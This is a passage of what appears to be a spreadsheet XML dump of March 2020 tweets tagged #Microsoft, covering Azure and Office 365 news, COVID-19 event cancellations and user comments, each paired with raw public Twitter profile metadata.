'https://pbs.twimg.com/profile_banners/805725399124561920/1519643422',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</si>
  <si>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07:55:52 +0000 2020</t>
  </si>
  <si>
    <t>An insightful examination of #culturechange within #Microsoft at a point when its market position was being eroded, attitudes seemed fixed and actions lacking in innovation. Thanks @EatSleepWkRpt https://t.co/6rDWtXqjsZ</t>
  </si>
  <si>
    <t>{'id': 2151730160, 'id_str': '2151730160', 'name': 'Your Career Matters', 'screen_name': 'YourCareerMttrs', 'location': 'United Kingdom', 'description': 'Helping high performing professionals career change successfully and job search effectively into rewarding, enjoyable work. #jobsearchadvice #careerchangehelp', 'url': 'https://t.co/TkjXD8tUQz', 'entities': {'url': {'urls': [{'url': 'https://t.co/TkjXD8tUQz', 'expanded_url': 'https://www.YourCareerMatters.co.uk', 'display_url': 'YourCareerMatters.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1458, 'friends_count': 1104, 'listed_count': 184, 'created_at': 'Wed Oct 23 21:48:28 +0000 2013', 'favourites_count': 8660, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 23386,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'http://pbs.twimg.com/profile_images/378800000666229889/50bdb434e43f1459e8a5a17e6893dcfa_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000666229889/50bdb434e43f1459e8a5a17e6893dcfa_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2151730160/1488445345',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</si>
  <si>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07:55:07 +0000 2020</t>
  </si>
  <si>
    <t>@Europol please help combat cyber crime by call centres run in India and elsewhere which are pretending to be Microsoft, contacting victims globally to demand money to restore their computer security.
#Microsoft https://t.co/E1Uyy182kq</t>
  </si>
  <si>
    <t>{'id': 941444713, 'id_str': '941444713', 'name': 'Caesium_star', 'screen_name': 'Caesium_star', 'location': '', 'description': 'Enceladus will awaken when his kins fall', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 15, 'friends_count': 10, 'listed_count': 0, 'created_at': 'Sun Nov 11 14:37:44 +0000 2012', 'favourites_count': 886, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1815,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'http://pbs.twimg.com/profile_images/1130554370259607553/7hsCKtd7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1130554370259607553/7hsCKtd7_normal.jpg',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</si>
  <si>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07:53:17 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft officially announces Universal Print, a cloud-based print server solution - https://t.co/Q2nMknEwLh #Microsoft #UniversalPrint https://t.co/yFXAPklh38</t>
  </si>
  <si>
    <t>{'id': 11629882, 'id_str': '11629882', 'name': 'Naceron', 'screen_name': 'Naceron', 'location': 'Internet ðŸŒ', 'description': 'Digital Specialist &amp; Tech Geek. #LessIsMore #DigitalPower', 'url': 'https://t.co/WBYrqAgxVB', 'entities': {'url': {'urls': [{'url': 'https://t.co/WBYrqAgxVB', 'expanded_url': 'https://instagram.com/naceron', 'display_url': 'instagram.com/naceron', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2865, 'friends_count': 2653, 'listed_count': 113, 'created_at': 'Sat Dec 29 13:40:39 +0000 2007', 'favourites_count': 5761, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 16269, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FDB913', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1135154860163309569/OjpzPBwh_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1135154860163309569/OjpzPBwh_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/11629882/1446912484', 'profile_link_color': 'FDB913',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</si>
  <si>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07:52:20 +0000 2020</t>
  </si>
  <si>
    <t>#M365Roadmap change:Outlook for Windows:  Advanced Room Finder with filters
#Microsoft
Prop:RM Release
old:Q3 CY2020
new:April CY2020</t>
  </si>
  <si>
    <t>{'id': 1081836473157074944, 'id_str': '1081836473157074944', 'name': 'cloudscout.one', 'screen_name': 'CloudscoutO', 'location': 'Europe', 'description': 'Getting updates on new #Microsoft365 #Roadmap items is easy. \nOur service twitters latest changes to existing Microsoft 365 Roadmap items. #Office365', 'url': 'https://t.co/Rgy3ahDioh', 'entities': {'url': {'urls': [{'url': 'https://t.co/Rgy3ahDioh', 'expanded_url': 'http://www.cloudscout.one', 'display_url': 'cloudscout.one', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1102, 'friends_count': 207, 'listed_count': 2, 'created_at': 'Sun Jan 06 08:54:49 +0000 2019', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6359,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'http://pbs.twimg.com/profile_images/1081836837382094848/epKIBbga_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1081836837382094848/epKIBbga_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1081836473157074944/1547304703', 'profile_link_color': '184A66',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</si>
  <si>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07:47:29 +0000 2020</t>
  </si>
  <si>
    <t>My next blog is online!! Provision Data Lake Store with files by using #PowerShell ..
https://t.co/FDykHULHAd
#Azure #Microsoft #DataLakeStore #DLS #SQLFrank</t>
  </si>
  <si>
    <t>{'id': 274969542, 'id_str': '274969542', 'name': 'Frank Ruiter', 'screen_name': 'Frk_85', 'location': 'Netherlands', 'description': 'Business Intelligence Consultant | MCSE Business Intelligence | MCSE Data Platform', 'url': 'https://t.co/DeFJVWOCse', 'entities': {'url': {'urls': [{'url': 'https://t.co/DeFJVWOCse', 'expanded_url': 'http://www.ruiterbisolutions.nl', 'display_url': 'ruiterbisolutions.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 44, 'friends_count': 135, 'listed_count': 2, 'created_at': 'Thu Mar 31 11:23:10 +0000 2011', 'favourites_count': 115, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 135,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'http://pbs.twimg.com/profile_images/1101114850216951808/AMgBHDwQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1101114850216951808/AMgBHDwQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/274969542/1565092967',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</si>
  <si>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07:46:02 +0000 2020</t>
  </si>
  <si>
    <t>@SnazzyQ #Microsoft OS was way ahead of its time, I still remember my first smartphone Samsung Omnia M... Amoled Display + Windows OS  blew my mind off</t>
  </si>
  <si>
    <t>{'id': 826099863830069249, 'id_str': '826099863830069249', 'name': 'Mr.Ingenious', 'screen_name': 'theMrIngeniouss', 'location': 'Mumbai', 'description': "I'm Your Friendly Neighborhood Techie Who's Entrepreneur/Youtuber in Daytime &amp; Streamer at Dawn", 'url': 'https://t.co/qiWkthAtj5', 'entities': {'url': {'urls': [{'url': 'https://t.co/qiWkthAtj5', 'expanded_url': 'http://www.youtube.com/c/mringenious', 'display_url': 'youtube.com/c/mringenious', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 53, 'friends_count': 526, 'listed_count': 0, 'created_at': 'Mon Jan 30 16:08:50 +0000 2017', 'favourites_count': 377, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1292,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'http://pbs.twimg.com/profile_images/1207745514936029184/igPt-Of7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1207745514936029184/igPt-Of7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/826099863830069249/1576359562', 'profile_link_color': 'FAC930',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</si>
  <si>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07:45:03 +0000 2020</t>
  </si>
  <si>
    <t>#ConditionalAccess can help protect your #data from harm, but what does that harm actually look like? 
Check out this @IdentityExperts blog to find out what threats you're up against, and how to beat them.
#Microsoft #CyberSec #InfoSec
https://t.co/ZjyFvpJ8NJ https://t.co/G3rfF7LG4O</t>
  </si>
  <si>
    <t>{'id': 1172531700716449792, 'id_str': '1172531700716449792', 'name': 'Identity_Gavin', 'screen_name': 'Identity_Gavin', 'location': 'Manchester', 'description': 'Technical Trainer for @IdentityExperts\n\nAll views are my own', 'url': 'https://t.co/fR8QKhtqqJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/fR8QKhtqqJ', 'expanded_url': 'https://identityexperts.co.uk', 'display_url': 'identityexperts.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 30, 'friends_count': 139, 'listed_count': 0, 'created_at': 'Fri Sep 13 15:25:29 +0000 2019', 'favourites_count': 193, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 112, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1172531831142526978/NafmEB1N_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1172531831142526978/NafmEB1N_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1172531700716449792/1568388506',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</si>
  <si>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07:36:11 +0000 2020</t>
  </si>
  <si>
    <t>Burst 4K encoding on Azure Kubernetes Service
#IFITech #Microsoft #Azure #Cloud #AKS #K8S #Media #Containers
https://t.co/4RI3n1b8CW</t>
  </si>
  <si>
    <t>Tue Mar 03 07:35:40 +0000 2020</t>
  </si>
  <si>
    <t>Preview of Active Directory authentication support on Azure Files
#IFITech #Microsoft #Azure #Cloud #Storage
https://t.co/IctT7Py72z</t>
  </si>
  <si>
    <t>Tue Mar 03 07:35:07 +0000 2020</t>
  </si>
  <si>
    <t>WHERE IS THE Corona V App for updates? Helllllllllllo Microsoft and Apple in WA -help the cause #CoronaVirusSeattle #iOS #apple #Microsoft</t>
  </si>
  <si>
    <t>{'id': 891214662548594690, 'id_str': '891214662548594690', 'name': 'Cynthia A Tracy', 'screen_name': 'cynthia_a_tracy', 'location': 'Seattle, WA', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 28, 'friends_count': 123, 'listed_count': 1, 'created_at': 'Sat Jul 29 08:31:48 +0000 2017', 'favourites_count': 1655, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 218, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1224905428829528065/-tA41u6x_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224905428829528065/-tA41u6x_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/891214662548594690/1580875159',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</si>
  <si>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07:35:00 +0000 2020</t>
  </si>
  <si>
    <t>New Azure Firewall certification and features in Q1 CY2020
#IFITech #Microsoft #Azure #Cloud #Firewall #Security 
https://t.co/nGmF71Qz3s</t>
  </si>
  <si>
    <t>Tue Mar 03 07:34:20 +0000 2020</t>
  </si>
  <si>
    <t>New Custom Deployment Methods in #Horizon #Cloud on #Microsoft #Azure https://t.co/P7DGMWB2uj</t>
  </si>
  <si>
    <t>{'id': 100584415, 'id_str': '100584415', 'name': 'Dukagjin Maloku', 'screen_name': 'DugiDM', 'location': 'Kosovo', 'description': 'All about Virtualization SDDC, Cloud &amp; Storage, vmware vExpert 2020/19/18/17, Nutanix NTC 2019/18/17 NPP, Azure, HCI, rMVP, Lead @VMUGKSAL, TFDelegate', 'url': 'https://t.co/nthwejxW3b', 'entities': {'url': {'urls': [{'url': 'https://t.co/nthwejxW3b', 'expanded_url': 'http://www.linkedin.com/in/dukagjini', 'display_url': 'linkedin.com/in/dukagjini', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1539, 'friends_count': 826, 'listed_count': 479, 'created_at': 'Wed Dec 30 20:08:48 +0000 2009', 'favourites_count': 2011, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 25258,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'http://pbs.twimg.com/profile_images/900610929439764481/1ICedz3U_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/900610929439764481/1ICedz3U_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/100584415/1438765578',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</si>
  <si>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07:31:58 +0000 2020</t>
  </si>
  <si>
    <t>Huge spike in remote work amid novel coronavirus outbreak 
#remoteworking #Google #Microsoft #coronavirus
https://t.co/lq5JH1EeUP</t>
  </si>
  <si>
    <t>Tue Mar 03 07:27:25 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">@LOLrakshak @kumarmanish9 @BhavsarIshit @AmitHPanchal @aravindchaudhri @Chiragkapuriya @KrunalShah225 @LangaMahesh @MadhishParikh @ShrutiKushwah @JaydipParikh @still_amystery Noticed that LinkedIn is missing from the list. So may be it is a way of getting #microsoft to shift their headquarters here. </t>
  </si>
  <si>
    <t>{'id': 24418683, 'id_str': '24418683', 'name': 'PonniyinSelvan', 'screen_name': 'followVasan', 'location': '', 'description': 'Life long learner. Views and Opinions are personal and not of employer. RTs are not endorsements', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 482, 'friends_count': 398, 'listed_count': 100, 'created_at': 'Sat Mar 14 19:47:09 +0000 2009', 'favourites_count': 982, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6278, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'DADDC0', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/665216172741144577/FXAJclLu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/665216172741144577/FXAJclLu_normal.jpg', 'profile_link_color': 'FF691F', 'profile_sidebar_border_color': 'E2EAEF', 'profile_sidebar_fill_color': 'E2EAEF', 'profile_text_color': '6C961C', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 07:26:12 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft just announced that ignite has been officially canceled #Microsoft #microsoftignite #Corona https://t.co/wsHU8C9s1v</t>
  </si>
  <si>
    <t>{'id': 1193488655404470272, 'id_str': '1193488655404470272', 'name': 'Carlos', 'screen_name': 'carlosbfitnl', 'location': 'The Netherlands', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 17, 'listed_count': 0, 'created_at': 'Sun Nov 10 11:21:15 +0000 2019', 'favourites_count': 15,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'http://pbs.twimg.com/profile_images/1226208686634393601/kkxllAQ5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226208686634393601/kkxllAQ5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1193488655404470272/1581185908',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</si>
  <si>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07:25:54 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft products have this lovely tendency to crash whenever you are in a hurry.. makes you wanna use them all the time..</t>
  </si>
  <si>
    <t>{'id': 754390447242567680, 'id_str': '754390447242567680', 'name': 'Amra DeliÄ‡', 'screen_name': 'Amra_Dl', 'location': 'Vienna, Austria', 'description': 'PhD student at TU Wien; deals with data science, recommender systems, machine learning, statistics...', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 159, 'friends_count': 226, 'listed_count': 3, 'created_at': 'Sat Jul 16 19:01:13 +0000 2016', 'favourites_count': 4023, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 307, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/901558788767068161/TxvoDcR3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/901558788767068161/TxvoDcR3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/754390447242567680/1470118781',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</si>
  <si>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07:25:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft named a Leader in Gartners 2020 Magic Quadrant for Analytics and BI Platforms https://t.co/qDOem5rLAN via @MSPowerBI.  #powerbi #Microsoft #Gartner</t>
  </si>
  <si>
    <t>{'id': 1192756921545023493, 'id_str': '1192756921545023493', 'name': 'Ishita Patel', 'screen_name': 'Its_ishitaP', 'location': '', 'description': 'I help companies improve Business Processes through Microsoft Dynamics 365 products and services.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 193, 'friends_count': 643, 'listed_count': 2, 'created_at': 'Fri Nov 08 10:53:17 +0000 2019', 'favourites_count': 114,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'http://pbs.twimg.com/profile_images/1192759937404821505/jWhiQ60K_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1192759937404821505/jWhiQ60K_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1192756921545023493/1573534416',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</si>
  <si>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07:24:46 +0000 2020</t>
  </si>
  <si>
    <t>What do you need to stay on top of all the #Office365 Updates? Just read this, written by two #Microsoft PFEs. Staying on top of Office 365 Updates https://t.co/GzdjbSEnGx</t>
  </si>
  <si>
    <t>{'id': 471089079, 'id_str': '471089079', 'name': 'Florian derLutz | 365gearHead', 'screen_name': '1derLutz', 'location': 'Vienna', 'description': '#SharePoint and #Office365 Enthusiast, Speaker, gearHead and Photographer. Working Dad. Always in motion.', 'url': 'https://t.co/WL3mqnvs1s', 'entities': {'url': {'urls': [{'url': 'https://t.co/WL3mqnvs1s', 'expanded_url': 'http://www.derLutz.at', 'display_url': 'derLutz.at', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 223, 'friends_count': 522, 'listed_count': 20, 'created_at': 'Sun Jan 22 13:49:22 +0000 2012', 'favourites_count': 8972, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1101,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'http://pbs.twimg.com/profile_images/1225739080115400704/cKKRK73m_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225739080115400704/cKKRK73m_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/471089079/1445036086',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</si>
  <si>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07:24:29 +0000 2020</t>
  </si>
  <si>
    <t>Moving to virtual business meetings for the next two weeks. See you on #MicrosoftTeams. #Microsoft #MicrosoftIoT</t>
  </si>
  <si>
    <t>{'id': 1650982598, 'id_str': '1650982598', 'name': 'mitko ç±³å¯', 'screen_name': 'iotcoi', 'location': 'EMEA', 'description': 'Founder, owner, geek, and technologist.\nNow #Microsoft #mitkox #tpmdev Ex #OADigital #Cisco. \nMy focus #B2B #Enterprise #Tech #IoT #AI #ML \nTweets are my own.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1018, 'friends_count': 855, 'listed_count': 81, 'created_at': 'Tue Aug 06 18:50:28 +0000 2013', 'favourites_count': 3844, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3028,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'http://pbs.twimg.com/profile_images/1031869048596910080/Db-Mrbn8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1031869048596910080/Db-Mrbn8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1650982598/1581277056',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</si>
  <si>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07:23:58 +0000 2020</t>
  </si>
  <si>
    <t>The latest The Microsoft Azure Daily! https://t.co/i8hHG2R6nP Thanks to @Alex_A_Simons @PulumiCorp @Outlook #microsoft #azure</t>
  </si>
  <si>
    <t>{'id': 4831487532, 'id_str': '4831487532', 'name': 'David Williams', 'screen_name': 'dwilliamhoustn', 'location': 'Houston, TX', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 63, 'friends_count': 368, 'listed_count': 4, 'created_at': 'Fri Jan 29 19:08:42 +0000 2016', 'favourites_count': 760, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1128, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/970509722502729728/_QsUQhrh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/970509722502729728/_QsUQhrh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4831487532/1520222525',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</si>
  <si>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07:23:24 +0000 2020</t>
  </si>
  <si>
    <t>#Oracle follows #Microsoft and #Google and has decided to postpone the #OpenWorld Asia event in #Singapore. Check out other tech events cancelled due to #Coronavirus outbreak. https://t.co/Nb47oCY20G</t>
  </si>
  <si>
    <t>{'id': 1044919739745796096, 'id_str': '1044919739745796096', 'name': 'Riziliant Technologies', 'screen_name': 'riziliant', 'location': 'Noida, India', 'description': 'Riziliant is a leading Application and Website development company delivering differentiated Mobile Application and Website experiences.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 19, 'friends_count': 167, 'listed_count': 0, 'created_at': 'Wed Sep 26 12:00:54 +0000 2018', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1100742975980822530/yiI7ptg2_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1100742975980822530/yiI7ptg2_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1044919739745796096/1542975703',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</si>
  <si>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07:22:01 +0000 2020</t>
  </si>
  <si>
    <t>#AzureDayPL2020 today. Feel free to join us in the #MICROSOFT booth.</t>
  </si>
  <si>
    <t>{'id': 394688246, 'id_str': '394688246', 'name': 'RafalCzuprynski', 'screen_name': 'RafalCzuprynski', 'location': 'Warsaw', 'description': 'Microsoft Audience Evangelism Lead. Explorer in the further regions of experience...', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 522, 'friends_count': 362, 'listed_count': 85, 'created_at': 'Thu Oct 20 13:36:39 +0000 2011', 'favourites_count': 207, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1640,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'http://pbs.twimg.com/profile_images/610519103049199616/AyJAxGUd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/610519103049199616/AyJAxGUd_normal.jpg',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</si>
  <si>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07:21:55 +0000 2020</t>
  </si>
  <si>
    <t>Watch how #linuxfoundation and other #microsoft / #ibm houses (front groups) do nothing about it. They never even submit a measle brief on the subject of #swpats https://t.co/vwLBHOEpKR</t>
  </si>
  <si>
    <t>Tue Mar 03 07:21:14 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft cancels MVP Summit due to COVID-19 coronavirus fears https://t.co/icbANxLtkd via @ZDNet &amp;amp; @maryjofoley #Microsoft #MVPBuzz #MVPSummit</t>
  </si>
  <si>
    <t>{'id': 2256057823, 'id_str': '2256057823', 'name': 'Mia Chang', 'screen_name': 'bymiachang', 'location': 'Berlin, Germany', 'description': 'Microsoft AI MVP, Data Scientist, Book Author, Community Builder', 'url': 'https://t.co/XdLag6l476', 'entities': {'url': {'urls': [{'url': 'https://t.co/XdLag6l476', 'expanded_url': 'https://www.linkedin.com/in/mia-chang/', 'display_url': 'linkedin.com/in/mia-chang/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 475, 'friends_count': 997, 'listed_count': 9, 'created_at': 'Sat Dec 21 05:53:40 +0000 2013', 'favourites_count': 528, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 376,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'http://pbs.twimg.com/profile_images/842378868329652225/XC40LBkl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/842378868329652225/XC40LBkl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2256057823/1554575050',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</si>
  <si>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07:20:50 +0000 2020</t>
  </si>
  <si>
    <t>Due to the current COVID-19 situation Microsoft is cancelling the Microsoft Ignite The Tour Amsterdam conference on March 11 and 12.
You can visit https://t.co/iFF1gtIHV4 for the sessions and download the presentations
#Microsoft #IgniteTour #HealthandSafety</t>
  </si>
  <si>
    <t>{'id': 117405901, 'id_str': '117405901', 'name': 'Stefan Dingemanse', 'screen_name': 'SDingemanse', 'location': 'ÃœT: 52.126239,5.197299', 'description': 'Cloud consultant @ Veerman ICT - WVD enthousiast - Modern Workplace - Technology geek', 'url': 'https://t.co/ks6gK9mi0a', 'entities': {'url': {'urls': [{'url': 'https://t.co/ks6gK9mi0a', 'expanded_url': 'https://stefandingemanse.com', 'display_url': 'stefandingemanse.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 48, 'friends_count': 131, 'listed_count': 1, 'created_at': 'Thu Feb 25 13:21:41 +0000 2010', 'favourites_count': 152, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 109,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'http://pbs.twimg.com/profile_images/1159359348839239680/2GbCkerK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1159359348839239680/2GbCkerK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/117405901/1553891602',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</si>
  <si>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07:20:03 +0000 2020</t>
  </si>
  <si>
    <t>John Hoegger, Microsoft
on theCUBE from Stanford Women in Data Science (WiDS) 2020 
https://t.co/pwbutk2UrF
@JHoegger @Microsoft #Microsoft @Stanford #Stanford 
#theCUBE #WomenInTech @WiDS_Conference #WiDS2020 https://t.co/oP0eYlth1b</t>
  </si>
  <si>
    <t>Tue Mar 03 07:19:24 +0000 2020</t>
  </si>
  <si>
    <t>On my way to #SQLKonferenz im #Darmstadtium... rainy conditions but sunny mood 
Cu in some hours
#community #communityrocks #sqlpass #sqlpass_de #dataplatform #microsoft #azure https://t.co/uBwJwaKk6J</t>
  </si>
  <si>
    <t>{'id': 599261982, 'id_str': '599261982', 'name': 'Bjoern Peters (MVP) @SQLKonferenz', 'screen_name': 'SQL_aus_HH', 'location': 'Hamburg', 'description': 'Senior Consultant DataPlatform &amp; Azure @ Kramer&amp;Crew, father, husband, Azure Meetup Organizer, PowerShell learner, #communityrocks, Data Platform MVP, he/him', 'url': 'https://t.co/w8WvcNBjQM', 'entities': {'url': {'urls': [{'url': 'https://t.co/w8WvcNBjQM', 'expanded_url': 'https://about.me/bjoern.peters', 'display_url': 'about.me/bjoern.peters', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 615, 'friends_count': 655, 'listed_count': 84, 'created_at': 'Mon Jun 04 11:56:02 +0000 2012', 'favourites_count': 5547, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3643,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'http://pbs.twimg.com/profile_images/794066243796029440/CeJnY0P-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/794066243796029440/CeJnY0P-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/599261982/1553778915', 'profile_link_color': '3F3F3F',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</si>
  <si>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07:18:25 +0000 2020</t>
  </si>
  <si>
    <t>How to #set up a tab profile in #WindowsTerminal to automatically SSH into a #Linux box https://t.co/u4x15tzjdk #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Tue Mar 03 07:16:30 +0000 2020</t>
  </si>
  <si>
    <t>Go through an intense action story as Joanna and take out enemies in Perfect Dark Zero https://t.co/FsRerqYa3O #microsoft #xbox #xbox360 #gaming #darkness https://t.co/9TMNKAoM0l</t>
  </si>
  <si>
    <t>Tue Mar 03 07:11:18 +0000 2020</t>
  </si>
  <si>
    <t>The average cost of a data breach is $3.6 million. Is your company prepared to deal with the aftermath of a cyberattack? Check out this infographic for more on how we can help protect your company. #Microsoft #cybersecurity https://t.co/rdgILPDeMg</t>
  </si>
  <si>
    <t>Tue Mar 03 07:08:35 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that 83% of employees depend on technology to work together? The landscape of teamwork is changing--but we've got you covered. Check out this infographic to see how you can benefit from #Teamworksolutions from #Microsoft. https://t.co/3qbNJuGTKG</t>
  </si>
  <si>
